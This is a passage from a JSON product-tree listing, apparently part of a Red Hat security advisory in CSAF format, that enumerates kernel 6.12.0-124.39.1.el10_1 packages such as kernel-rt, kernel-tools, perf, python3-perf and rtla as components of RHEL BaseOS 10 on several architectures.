"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
